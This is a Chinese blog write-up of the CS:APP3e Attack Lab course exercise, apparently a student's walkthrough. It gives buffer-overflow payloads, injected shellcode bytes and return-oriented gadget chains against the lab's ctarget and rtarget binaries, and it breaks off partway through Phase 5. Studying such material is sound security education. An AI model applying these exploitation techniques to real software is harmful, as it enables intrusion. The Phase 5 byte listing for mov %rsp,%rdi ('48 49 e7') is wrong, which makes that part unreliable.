<!DOCTYPE html> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title> CS:APP3e Attack Lab | Chen Yeung </title> <meta name="author" content="Chen Yeung"> <meta name="description" content="Personal Crack on CS:APP3e Attack Lab"> <meta name="keywords" content="iamnotphage"> <link rel="stylesheet" href="/assets/css/bootstrap.min.css?a4b3f509e79c54a512b890d73235ef04"> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/mdbootstrap@4.20.0/css/mdb.min.css" integrity="sha256-jpjYvU3G3N6nrrBwXJoVEYI/0zw8htfFnhT9ljN3JJw=" crossorigin="anonymous"> <link defer rel="stylesheet" href="/assets/css/academicons.min.css?f0b7046b84e425c55f3463ac249818f5"> <link defer rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700|Roboto+Slab:100,300,400,500,700|Material+Icons&amp;display=swap"> <link defer rel="stylesheet" href="/assets/css/jekyll-pygments-themes-github.css?591dab5a4e56573bf4ef7fd332894c99" media="" id="highlight_theme_light"> <link defer href="/assets/css/bootstrap-toc.min.css?6f5af0bb9aab25d79b2448143cbeaa88" rel="stylesheet"> <link rel="shortcut icon" href="data:image/svg+xml,&lt;svg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20100%20100%22&gt;&lt;text%20y=%22.9em%22%20font-size=%2290%22&gt;%F0%9F%A7%91%F0%9F%8F%BB%E2%80%8D%F0%9F%92%BB&lt;/text&gt;&lt;/svg&gt;"> <link rel="stylesheet" href="/assets/css/main.css?d41d8cd98f00b204e9800998ecf8427e"> <link rel="canonical" href="https://iamnotphage.github.io/blog/2022/CSAPP3eAttack/"> <script src="/assets/js/theme.js?9a0c749ec5240d9cda97bc72359a72c0"></script> <link defer rel="stylesheet" href="/assets/css/jekyll-pygments-themes-native.css?5847e5ed4a4568527aa6cfab446049ca" media="none" id="highlight_theme_dark"> <script>initTheme();</script> </head> <body class="fixed-top-nav "> <header> <nav id="navbar" class="navbar navbar-light navbar-expand-sm fixed-top" role="navigation"> <div class="container"> <a class="navbar-brand title font-weight-lighter" href="/"> <span class="font-weight-bold">Chen</span> Yeung </a> <button class="navbar-toggler collapsed ml-auto" type="button" data-toggle="collapse" data-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar top-bar"></span> <span class="icon-bar middle-bar"></span> <span class="icon-bar bottom-bar"></span> </button> <div class="collapse navbar-collapse text-right" id="navbarNav"> <ul class="navbar-nav ml-auto flex-nowrap"> <li class="nav-item "> <a class="nav-link" href="/">about </a> </li> <li class="nav-item active"> <a class="nav-link" href="/blog/">blog </a> </li> <li class="nav-item "> <a class="nav-link" href="/projects/">projects </a> </li> <li class="nav-item "> <a class="nav-link" href="/repositories/">repositories </a> </li> <li class="nav-item "> <a class="nav-link" href="/cv/">cv </a> </li> <li class="nav-item dropdown "> <a class="nav-link dropdown-toggle" href="#" id="navbarDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">submenus </a> <div class="dropdown-menu dropdown-menu-right" aria-labelledby="navbarDropdown"> <a class="dropdown-item " href="/publications/">publications</a> <div class="dropdown-divider"></div> <a class="dropdown-item " href="/projects/">projects</a> <div class="dropdown-divider"></div> <a class="dropdown-item " href="/blog/">blog</a> </div> </li> <li class="nav-item"> <button id="search-toggle" title="Search" onclick="openSearchModal()"> <span class="nav-link">ctrl k <i class="ti ti-search"></i></span> </button> </li> <li class="toggle-container"> <button id="light-toggle" title="Change theme"> <i class="ti ti-sun-moon" id="light-toggle-system"></i> <i class="ti ti-moon-filled" id="light-toggle-dark"></i> <i class="ti ti-sun-filled" id="light-toggle-light"></i> </button> </li> </ul> </div> </div> </nav> <progress id="progress" value="0"> <div class="progress-container"> <span class="progress-bar"></span> </div> </progress> </header> <div class="container mt-5" role="main"> <div class="row"> <div class="col-sm-3"> <nav id="toc-sidebar" class="sticky-top"></nav> </div> <div class="col-sm-9"> <div class="post"> <header class="post-header"> <h1 class="post-title">CS:APP3e Attack Lab</h1> <p class="post-meta"> Created in June 02, 2022 </p> <p class="post-tags"> <a href="/blog/2022"> <i class="fa-solid fa-calendar fa-sm"></i> 2022 </a>   ·   <a href="/blog/tag/c"> <i class="fa-solid fa-hashtag fa-sm"></i> c</a>   <a href="/blog/tag/assembly"> <i class="fa-solid fa-hashtag fa-sm"></i> assembly</a>   <a href="/blog/tag/csapp"> <i class="fa-solid fa-hashtag fa-sm"></i> csapp</a>   <a href="/blog/tag/gdb"> <i class="fa-solid fa-hashtag fa-sm"></i> gdb</a>   <a href="/blog/tag/buffer"> <i class="fa-solid fa-hashtag fa-sm"></i> buffer</a>   <a href="/blog/tag/overflow"> <i class="fa-solid fa-hashtag fa-sm"></i> overflow</a>   <a href="/blog/tag/attack"> <i class="fa-solid fa-hashtag fa-sm"></i> attack</a>   ·   <a href="/blog/category/csapp"> <i class="fa-solid fa-tag fa-sm"></i> CSAPP</a>   <a href="/blog/category/%E9%A1%B9%E7%9B%AE"> <i class="fa-solid fa-tag fa-sm"></i> 项目</a> </p> </header> <article class="post-content"> <div id="markdown-content"> <p>确保先阅读并理解了CS:APPe3的<strong>3.10.3</strong>和<strong>3.10.4</strong></p> <p>先反编译:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>objdump <span class="nt">-d</span> ctarget <span class="o">&gt;</span> ctarget.asm
objdump <span class="nt">-d</span> rtarget <span class="o">&gt;</span> rtarget.asm
</code></pre></div></div> <p>最后确保仔细阅读官网的<code class="language-plaintext highlighter-rouge">writeup</code>，查看每个阶段需要做什么。</p> <h1 id="part-1">Part 1</h1> <p>先明白函数栈的生长方向。ret指令的作用。push指令的作用。%rsp和%rip的作用。</p> <p>能够使用gdb和objdump指令。</p> <p>code-injection攻击只适合这种，没有<code class="language-plaintext highlighter-rouge">栈随机化</code>和<code class="language-plaintext highlighter-rouge">限定可执行代码内存范围</code>的情况</p> <h2 id="phase-1">Phase 1</h2> <p>第一个阶段很简单，只要先查看给函数<code class="language-plaintext highlighter-rouge">getbuf</code>分配了多少栈空间，利用缓冲区溢出，修改<code class="language-plaintext highlighter-rouge">ret</code>指令的返回地址(上一个栈帧的栈顶)就行。</p> <div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="err">00000000004017</span><span class="nf">a8</span> <span class="o">&lt;</span><span class="nv">getbuf</span><span class="o">&gt;</span><span class="p">:</span>
  <span class="err">4017</span><span class="nl">a8:</span> <span class="err">48</span> <span class="err">83</span> <span class="nf">ec</span> <span class="mi">28</span>                  	<span class="nv">subq</span>	<span class="kc">$</span><span class="mh">0x28</span><span class="p">,</span> <span class="o">%</span><span class="nb">rsp</span>
  <span class="err">4017</span><span class="nl">ac:</span> <span class="err">48</span> <span class="err">89</span> <span class="nf">e7</span>                     	<span class="nv">movq</span>	<span class="o">%</span><span class="nb">rsp</span><span class="p">,</span> <span class="o">%</span><span class="nb">rdi</span>
  <span class="err">4017</span><span class="nl">af:</span> <span class="nf">e8</span> <span class="mi">8</span><span class="nv">c</span> <span class="mi">02</span> <span class="mi">00</span> <span class="mi">00</span>               	<span class="nv">callq</span>	<span class="mh">0x401a40</span> <span class="o">&lt;</span><span class="nv">Gets</span><span class="o">&gt;</span>
  <span class="err">4017</span><span class="nl">b4:</span> <span class="nf">b8</span> <span class="mi">01</span> <span class="mi">00</span> <span class="mi">00</span> <span class="mi">00</span>               	<span class="nv">movl</span>	<span class="kc">$</span><span class="mh">0x1</span><span class="p">,</span> <span class="o">%</span><span class="nb">eax</span>
  <span class="err">4017</span><span class="nl">b9:</span> <span class="err">48</span> <span class="err">83</span> <span class="nf">c4</span> <span class="mi">28</span>                  	<span class="nv">addq</span>	<span class="kc">$</span><span class="mh">0x28</span><span class="p">,</span> <span class="o">%</span><span class="nb">rsp</span>
  <span class="err">4017</span><span class="nl">bd:</span> <span class="nf">c3</span>                           	<span class="nv">retq</span>
  <span class="err">4017</span><span class="nl">be:</span> <span class="err">90</span>                           	<span class="nf">nop</span>
  <span class="err">4017</span><span class="nl">bf:</span> <span class="err">90</span>                           	<span class="nf">nop</span>

<span class="err">00000000004017</span><span class="nf">c0</span> <span class="o">&lt;</span><span class="nv">touch1</span><span class="o">&gt;</span><span class="p">:</span>
</code></pre></div></div> <p>给<code class="language-plaintext highlighter-rouge">getbuf</code>函数分配了<code class="language-plaintext highlighter-rouge">0x28</code>Byte的空间，也就是40Bytes</p> <p>输入48Bytes，最后一个8Byte设定为<code class="language-plaintext highlighter-rouge">touch1</code>函数的地址就行。</p> <p>注意是小端存储。</p> <div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00     # 到这里填充完getbuf的栈帧
c0 17 40 00 00 00 00 00     # 这里篡改了ret的返回函数地址
</code></pre></div></div> <p>我存储为<code class="language-plaintext highlighter-rouge">phase1.txt</code></p> <p>作为参数运行<code class="language-plaintext highlighter-rouge">rtarget</code>:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">cat </span>phase1.txt | ./hex2raw | ./ctarget <span class="nt">-q</span>
Cookie: 0x59b997fa
Type string:Touch1!: You called touch1<span class="o">()</span>
Valid solution <span class="k">for </span>level 1 with target ctarget
PASS: Would have posted the following:
	user <span class="nb">id	</span>bovik
	course	15213-f15
	lab	attacklab
	result	1:PASS:0xffffffff:ctarget:1:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 C0 17 40 00 00 00 00 00

</code></pre></div></div> <h2 id="phase-2">Phase 2</h2> <p>第二个阶段要求带参数进入<code class="language-plaintext highlighter-rouge">touch2</code>函数，<code class="language-plaintext highlighter-rouge">%rdi</code>作为第一个参数传递。</p> <p>问题在于，现在我们可以利用缓冲区溢出，修改上一个栈帧的栈顶，也就是ret指令的返回值。</p> <p>但是如何执行参数赋值呢？</p> <p>正常来说带参数调用函数，应该是先对参数赋值，然后进入函数。</p> <div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">movl</span> <span class="kc">$</span><span class="nv">cookie</span><span class="p">,</span> <span class="o">%</span><span class="nb">edi</span>
<span class="nf">call</span> <span class="o">&lt;</span><span class="nv">touch2</span><span class="o">&gt;</span>
</code></pre></div></div> <p>问题就在于如何插入这个movl的攻击代码。</p> <p>我们唯一能输入的内容只有缓冲区，所以一定在缓冲区内插入我们的代码（而且writeup的提示很明显，让我们使用gcc -c选项和objdump -d来手动获取一个汇编指令的字节码）</p> <p>根据第一个阶段的注入，我们可以让ret的地址，绕回这个缓冲区，也就是让<code class="language-plaintext highlighter-rouge">%rip</code>（又名程序计数器PC）来指向这个区域，然后逐条执行攻击代码。</p> <p>例如下面的输入。假设%rsp在getbuf函数中，值为0xabcde0</p> <p>那么可以让前一个栈帧（test函数）的栈顶改成0xabcde0</p> <p>从而<code class="language-plaintext highlighter-rouge">getbuf</code>内部的ret指令执行时，PC指向0xabcde0，那么这里开始只要注入代码，就可以照常执行攻击代码，从而对<code class="language-plaintext highlighter-rouge">%rdi</code>赋值cookie</p> <div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>00 00 00 00 00 00 00 00     # 假设这里的地址是0xabcde0  &lt;- %rsp
00 00 00 00 00 00 00 00     # 那么这里的地址是0xabcde8
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00     # 到这里填充完getbuf的栈帧
e0 cd ab 00 00 00 00 00     # 这里篡改了ret的返回函数地址 &lt;- %rsp + 0x28
</code></pre></div></div> <p>需要注意的是，执行完了movl给第一个参数赋值cookie，我们要跳转到<code class="language-plaintext highlighter-rouge">touch2</code>: 0x4017ec的位置</p> <p>writeup中说明了，最好不要使用call或者jmp指令，所以我们仍然使用ret指令。</p> <p>当<code class="language-plaintext highlighter-rouge">getbuf</code>内部的ret指令执行完毕后，PC指向攻击代码的部分，同时，%rsp指向原本栈帧<code class="language-plaintext highlighter-rouge">test</code>函数的部分</p> <p>为了跳转<code class="language-plaintext highlighter-rouge">touch2</code>，我们要push一次<code class="language-plaintext highlighter-rouge">touch2</code>的地址。</p> <p>所以初步的攻击代码如下:</p> <div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">movl</span>    <span class="kc">$</span><span class="mh">0x59b997fa</span><span class="p">,</span> <span class="o">%</span><span class="nb">edi</span>
<span class="nf">pushq</span>   <span class="kc">$</span><span class="mh">0x4017ec</span>
<span class="nf">ret</span>
</code></pre></div></div> <p>将其转为字节码后，作为输入的字符串。</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">touch </span>attack2.s
vim attack2.s     <span class="c"># 编辑代码</span>
gcc <span class="nt">-c</span> attack2.s
objdump <span class="nt">-d</span> attack2.o
</code></pre></div></div> <p>得到:</p> <div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>attack2.o:     file format elf64-x86-64


Disassembly of section .text:

0000000000000000 &lt;.text&gt;:
   0:	bf fa 97 b9 59       	mov    $0x59b997fa,%edi
   5:	68 ec 17 40 00       	pushq  $0x4017ec
   a:	c3                   	retq
</code></pre></div></div> <p>同时，需要知道当程序运行到<code class="language-plaintext highlighter-rouge">getbuf</code>时，<code class="language-plaintext highlighter-rouge">%rsp</code>寄存器的值，因为我们需要绕回到这个地址然后逐行执行攻击代码。</p> <p>在<code class="language-plaintext highlighter-rouge">getbuf</code>第二行汇编处断点，用gdb调试打印<code class="language-plaintext highlighter-rouge">%rsp</code>寄存器的值即可。</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">(</span>gdb<span class="o">)</span> i r rsp
0x5561dc78
</code></pre></div></div> <p>所以level2的注入代码如下:</p> <div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bf fa 97 b9 59 68 ec 17
40 00 c3 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00
</code></pre></div></div> <h2 id="phase-3">Phase 3</h2> <p>首先读懂要做什么，请仔细阅读writeup.</p> <p>其实就是getbuf结束后，不回到test函数，而是调用touch3，同时传入字符串。这个字符串的值要求是cookie的ascii表示:</p> <div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cookie: 0x59b997fa
hex:    35 39 62 39 39 37 66 61 # 这个作为字符串存放在内存的某个位置
</code></pre></div></div> <p>梳理一下内容，首先我们在test函数中调用了getbuf函数。</p> <p>然后有了这样的栈帧结构:</p> <p>(高地址在第一行, 注意下面是栈的结构)</p> <div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>?? ?? ?? ?? ?? ?? ?? ?? # test函数的栈帧
[ret address (64bit)]   # getbuf函数结束后ret的参考地址 这里是%rsp + 0x28
xx xx xx xx xx xx xx xx # getbuf分配了0x28 * 64bit的空间(64位机器)
xx xx xx xx xx xx xx xx #
xx xx xx xx xx xx xx xx #
xx xx xx xx xx xx xx xx #
xx xx xx xx xx xx xx xx # &lt;- %rsp的位置 同时也是缓冲区输入的位置
</code></pre></div></div> <p>按照level2的攻击方式，我们先把最后一行填充完毕，然后覆盖掉<code class="language-plaintext highlighter-rouge">ret address</code>的地址，让%rip指向上面的最后一行，也就是注入的代码。从而执行攻击代码。</p> <p>但是writeup中提及，当<code class="language-plaintext highlighter-rouge">hexmatch</code>和<code class="language-plaintext highlighter-rouge">strncmp</code>调用的时候，会push数据到栈中。</p> <p>下面是<code class="language-plaintext highlighter-rouge">getbuf</code>执行完毕后栈的情况:</p> <div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>?? ?? ?? ?? ?? ?? ?? ?? # test函数的栈帧 &lt;- %rsp的位置
[ret address (64bit)]   # 因为ret将%rip的位置设置到了这一行的地址
xx xx xx xx xx xx xx xx # getbuf分配了0x28 * 64bit的空间(64位机器)
xx xx xx xx xx xx xx xx #
xx xx xx xx xx xx xx xx #
xx xx xx xx xx xx xx xx #
xx xx xx xx xx xx xx xx # &lt;- %rip 即将要执行的攻击代码
</code></pre></div></div> <p>假如我们攻击代码要开始调用<code class="language-plaintext highlighter-rouge">touch3</code>了，然后内部再次调用<code class="language-plaintext highlighter-rouge">hexmatch</code>和<code class="language-plaintext highlighter-rouge">strncmp</code>函数。(这时候已经执行到攻击代码的最后一行ret)</p> <p>稍微查看<code class="language-plaintext highlighter-rouge">hexmatch</code>就会发现，它居然push了一堆东西，并且让%rsp减了0x80，这让我们的攻击代码被覆盖。</p> <p>其实代码被覆盖没有问题，因为我们在<code class="language-plaintext highlighter-rouge">gebuf</code>执行完毕之后，执行了一遍攻击代码，然后<code class="language-plaintext highlighter-rouge">ret</code>到我们设定的<code class="language-plaintext highlighter-rouge">touch3</code>位置。</p> <p>但是我们输入的字符串数据将会被覆盖，这就是要解决的问题。显然继续往栈顶放置字符串不妥，因为我们不清楚栈被push了多少内容。那就牺牲test函数的栈顶了。(<code class="language-plaintext highlighter-rouge">?</code>的位置)</p> <p>所以，这一次，我们需要将字符串作为参数，存放在test函数栈帧的栈顶位置(通过gebuf的缓冲区溢出来存放)，ret的地址设定为<code class="language-plaintext highlighter-rouge">touch3</code>的函数位置(通过攻击代码的push)。</p> <p>因为我们要手动填写<code class="language-plaintext highlighter-rouge">??</code>那一行，<code class="language-plaintext highlighter-rouge">touch3</code>的第一个参数<code class="language-plaintext highlighter-rouge">%rdi</code>要填入<code class="language-plaintext highlighter-rouge">??</code>那一行的地址。通过前文，或者gdb直接打印地址就行:<code class="language-plaintext highlighter-rouge">0x5561dca8</code></p> <div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">mov</span>   <span class="kc">$</span><span class="mh">0x5561dca8</span><span class="p">,</span> <span class="o">%</span><span class="nb">rdi</span>
<span class="nf">push</span>  <span class="kc">$</span><span class="mh">0x4018fa</span>
<span class="nf">ret</span>
</code></pre></div></div> <p>获取这段代码的字节码：</p> <div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="nl">attack3.o:</span>     <span class="nf">file</span> <span class="nv">format</span> <span class="nv">elf64</span><span class="o">-</span><span class="nv">x86</span><span class="o">-</span><span class="mi">64</span>


<span class="nf">Disassembly</span> <span class="nv">of</span> <span class="nv">section</span> <span class="nv">.text</span><span class="p">:</span>

<span class="err">0000000000000000</span> <span class="o">&lt;</span><span class="nf">.text</span><span class="o">&gt;</span><span class="p">:</span>
   <span class="err">0</span><span class="p">:</span>	<span class="err">48</span> <span class="nf">c7</span> <span class="nv">c7</span> <span class="nv">a8</span> <span class="nv">dc</span> <span class="mi">61</span> <span class="mi">55</span> 	<span class="nv">mov</span>    <span class="kc">$</span><span class="mh">0x5561dca8</span><span class="p">,</span><span class="o">%</span><span class="nb">rdi</span>
   <span class="err">7</span><span class="p">:</span>	<span class="err">68</span> <span class="nf">fa</span> <span class="mi">18</span> <span class="mi">40</span> <span class="mi">00</span>       	<span class="nv">pushq</span>  <span class="kc">$</span><span class="mh">0x4018fa</span>
   <span class="nl">c:</span>	<span class="nf">c3</span>                   	<span class="nv">retq</span>

</code></pre></div></div> <p>所以答案<code class="language-plaintext highlighter-rouge">phase3.txt</code>是:</p> <div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>48 c7 c7 a8 dc 61 55 68 # 攻击代码从这里开始 %rip是逐行执行
fa 18 40 00 c3 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00 # getbuf结束后ret返回攻击代码的第一行
35 39 62 39 39 37 66 61 # 覆盖test函数栈帧，安全存放字符串
</code></pre></div></div> <h1 id="part-2">Part 2</h1> <p>前面每次运行<code class="language-plaintext highlighter-rouge">ctarget</code>的时候，栈的地址都是一样的。</p> <p>但是这里<code class="language-plaintext highlighter-rouge">rtarget</code>加入了栈随机化。</p> <p>这就导致了<code class="language-plaintext highlighter-rouge">phase2</code>和<code class="language-plaintext highlighter-rouge">phase3</code>很难再通过找到<code class="language-plaintext highlighter-rouge">%rsp</code>的地址来执行我们自己注入的代码。因为每次运行<code class="language-plaintext highlighter-rouge">%rsp</code>的值都不一样。</p> <p>所以得根据writeup中的<code class="language-plaintext highlighter-rouge">ROP</code>策略利用已有的字节码来执行需要的操作。</p> <p>利用<code class="language-plaintext highlighter-rouge">farm.c</code>的代码，来看看有没有什么灵感。</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gcc <span class="nt">-c</span> farm.c
objdump <span class="nt">-d</span> farm.o <span class="o">&gt;</span> farm.asm
</code></pre></div></div> <h2 id="phase-4">Phase 4</h2> <p>要求实现跟<code class="language-plaintext highlighter-rouge">Phase 2</code>一样的操作，只不过是在<code class="language-plaintext highlighter-rouge">rtarget</code>上运行。</p> <p>并且只能使用前八个寄存器.(<code class="language-plaintext highlighter-rouge">%rax</code> ~ <code class="language-plaintext highlighter-rouge">%rdi</code>)</p> <p>查看<code class="language-plaintext highlighter-rouge">rtarget</code>的反编译结果，跟<code class="language-plaintext highlighter-rouge">ctarget</code>没什么两样，问题就在于我们不能注入代码了，因为加入了栈随机化，我们不知道我们注入的代码在栈的地址。</p> <p>总体而言的操作和<code class="language-plaintext highlighter-rouge">Phase 2</code>一样:</p> <div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>attack2.o:     file format elf64-x86-64


Disassembly of section .text:

0000000000000000 &lt;.text&gt;:
   0:	bf fa 97 b9 59       	mov    $0x59b997fa,%edi
   5:	68 ec 17 40 00       	pushq  $0x4017ec
   a:	c3                   	retq
</code></pre></div></div> <p>然后我们能够控制的就是缓冲区的输入，替换掉ret的地址，然后一直链式反应，执行我们的代码.</p> <p>比如<code class="language-plaintext highlighter-rouge">ret</code>的字节码是<code class="language-plaintext highlighter-rouge">c3</code>, <code class="language-plaintext highlighter-rouge">nop</code>的字节码是<code class="language-plaintext highlighter-rouge">90</code></p> <p>那么我们需要有这样的栈结构（尽管会破坏test函数栈）:</p> <p>当<code class="language-plaintext highlighter-rouge">getbuf</code>执行完毕，<code class="language-plaintext highlighter-rouge">%rsp</code>加上<code class="language-plaintext highlighter-rouge">0x28</code>然后指向下面的<code class="language-plaintext highlighter-rouge">address</code></p> <p>然后进行<code class="language-plaintext highlighter-rouge">ret</code>指令</p> <div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>address + 0x8: [gadget 2的地址]
address:       [gadget 1的地址]  # &lt;- %rsp 即将ret跳转到gadget1
--------上面是栈的结构----------

gadget 1: bf fa 97 b9 59 c3 # mov &lt;cookie&gt;, %edi; ret
gadget 2: 68 ec 17 40 00 c3 # pushq $0x4017ec; ret然后进入touch2
</code></pre></div></div> <p>那么一目了然，只需要找到这样的字节码就行，然后在缓冲区输入gadgets的地址就行。</p> <p>很遗憾我并没有从<code class="language-plaintext highlighter-rouge">farm</code>相关的字节码找到最核心的<code class="language-plaintext highlighter-rouge">0x4017ec</code>和<code class="language-plaintext highlighter-rouge">0x59b997fa</code></p> <p>所以我们必须在缓冲区输入这个地址，然后利用<code class="language-plaintext highlighter-rouge">pop</code>指令，让某个寄存器存放这个值（touch3的地址或者cookie值）</p> <p>所以进一步推理栈的结构很可能是这:</p> <div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>address + 0x10:[touch2的地址]
address + 0x8: [cookie的值]
address:       [gadget 1的地址]  # &lt;- %rsp 即将ret跳转到gadget1
--------上面是栈的结构----------

gadget 1: popq %rdi;            # 将cookie存放在rdi中
gadget 2: ret;                  # 然后ret进入touch2
</code></pre></div></div> <p>让我们梳理一下，按照上述的栈结构，发生了什么。</p> <p>当我们输入好攻击的内容后，栈变成上述内容。然后<code class="language-plaintext highlighter-rouge">getbuf</code>即将返回，<code class="language-plaintext highlighter-rouge">%rsp</code>指向ret的地址(已经被我们篡改成gadet 1的地址)。然后<code class="language-plaintext highlighter-rouge">%rsp</code>再次加0x8，同时我们进入gadet1，执行<code class="language-plaintext highlighter-rouge">pop</code>指令把cookie存在<code class="language-plaintext highlighter-rouge">%rdi</code>。pop指令一执行，<code class="language-plaintext highlighter-rouge">%rsp</code>再次加0x8然后，再紧接着执行gadget2的<code class="language-plaintext highlighter-rouge">ret</code>，也就是进入<code class="language-plaintext highlighter-rouge">touch3</code></p> <p>也就是，我们需要这样的gadgets:</p> <div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>5f c3 # popq $rdi; ret;
</code></pre></div></div> <p>在<code class="language-plaintext highlighter-rouge">rtarget.asm</code>中，很容易找到:</p> <div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="err">401419</span><span class="p">:</span> <span class="err">69</span> <span class="nf">c0</span> <span class="mi">5</span><span class="nv">f</span> <span class="nv">c3</span> <span class="mi">00</span> <span class="mi">00</span>            	<span class="nv">imull</span>	<span class="kc">$</span><span class="mh">0xc35f</span><span class="p">,</span> <span class="o">%</span><span class="nb">eax</span><span class="p">,</span> <span class="o">%</span><span class="nb">eax</span>     <span class="err">#</span> <span class="nv">imm</span> <span class="err">=</span> <span class="mh">0xC35F</span>
</code></pre></div></div> <p>所以gadgets的地址是<code class="language-plaintext highlighter-rouge">0x40141b</code></p> <p>所以缓冲区输入<code class="language-plaintext highlighter-rouge">phase4.txt</code>:</p> <div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
1b 14 40 00 00 00 00 00
fa 97 b9 59 00 00 00 00
ec 17 40 00 00 00 00 00
</code></pre></div></div> <p>精彩，不过为什么没用到<code class="language-plaintext highlighter-rouge">farm</code>的代码段呢，<em>无所谓了</em>。</p> <p>只要达到了攻击效果就行。</p> <p>（然而我仔细阅读了writeup之后发现，我们需要的字节码都能够在<code class="language-plaintext highlighter-rouge">start_farm</code>到<code class="language-plaintext highlighter-rouge">mid_farm</code>中找到, 其实就是pop到<code class="language-plaintext highlighter-rouge">%rax</code>中，然后再赋值给<code class="language-plaintext highlighter-rouge">%rdi</code>而已，只不过正好被我在别的程序段找到了更简洁的解法。）</p> <h2 id="phase-5">Phase 5</h2> <p>Phase5要求和Phase3一样，调用<code class="language-plaintext highlighter-rouge">touch3</code>并且传入字符串<code class="language-plaintext highlighter-rouge">cookie</code></p> <p>与Phase3不同的是，<code class="language-plaintext highlighter-rouge">rtarget</code>采用了栈随机化，导致我们的字符串若是存在栈中，我们需要解决栈的地址的问题。</p> <p>那么总体还是一样的，就是调用<code class="language-plaintext highlighter-rouge">touch3</code>之前，保证<code class="language-plaintext highlighter-rouge">%rdi</code>的值是字符串的地址。</p> <p>此外，还要将</p> <div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>35 39 62 39 39 37 66 61 # cookie的ASCII表示
</code></pre></div></div> <p>存在那个地址。</p> <p>然后将<code class="language-plaintext highlighter-rouge">touch3</code>的地址压入栈中，<code class="language-plaintext highlighter-rouge">ret</code>指令进入<code class="language-plaintext highlighter-rouge">touch3</code>:<code class="language-plaintext highlighter-rouge">0x4018fa</code></p> <p>但是，<code class="language-plaintext highlighter-rouge">rtarget</code>中，我相信一定不会有这样的内存区域正好存着cookie的ASCII，所以这一串仍然需要我们通过缓冲区溢出的漏洞，写入栈帧中。</p> <p>那么问题就在于，如何在栈随机化的程序上，明确<code class="language-plaintext highlighter-rouge">%rsp</code>的值呢？</p> <p>或者，我们只需要<code class="language-plaintext highlighter-rouge">%rsp</code>的值赋值给<code class="language-plaintext highlighter-rouge">%rdi</code>，然后对<code class="language-plaintext highlighter-rouge">%rdi</code>进行一些加减操作，偏移到我们存储的地方即可。</p> <p>并且注意到<code class="language-plaintext highlighter-rouge">farm.c</code>中正好就有定义<code class="language-plaintext highlighter-rouge">add_xy(long x, long y)</code>:并且在<code class="language-plaintext highlighter-rouge">rtarget.asm</code>中的<code class="language-plaintext highlighter-rouge">0x4019d6</code></p> <p>那么显然我们有这样的栈结构和操作:</p> <div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>address + 0x28:[cookie的ASCII]  # &lt;- %rdi + 0x20
address + 0x20: [touch3的地址]
address + 0x18: [add_xy()的地址]
address + 0x10: [第二个参数:0x20]
address + 0x8: [gadget 3的地址]  # mov %rsp, %rdi之前，%rsp是在这
address:       [gadget 1的地址]  # &lt;- %rsp 即将ret跳转到gadget1
--------上面是栈的结构----------

gadget 1: mov %rsp, %rdi        # 获取%rsp的值 初始化add的第一个参数
gadget 2: ret                   # 进入gaget3
gadget 3: popq %rsi             # 初始化%rsi第二个参数为0x20
gadget 4: ret                   # 然后ret进入add_xy

# 进入add_xy之后ret
# %rax为加法结果: %rdi + 0x20

gadget 5: mov %rax, %rdi        # 加法结果保存为第一个参数
gadget 6: ret
</code></pre></div></div> <p>对照gadgets的指令有:</p> <div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>48 49 e7 # mov %rsp, %rdi
c3       # ret
5e       # popq %rsi
c3       # ret
48 89 c7 # mov %rax, %rdi
c3       # ret
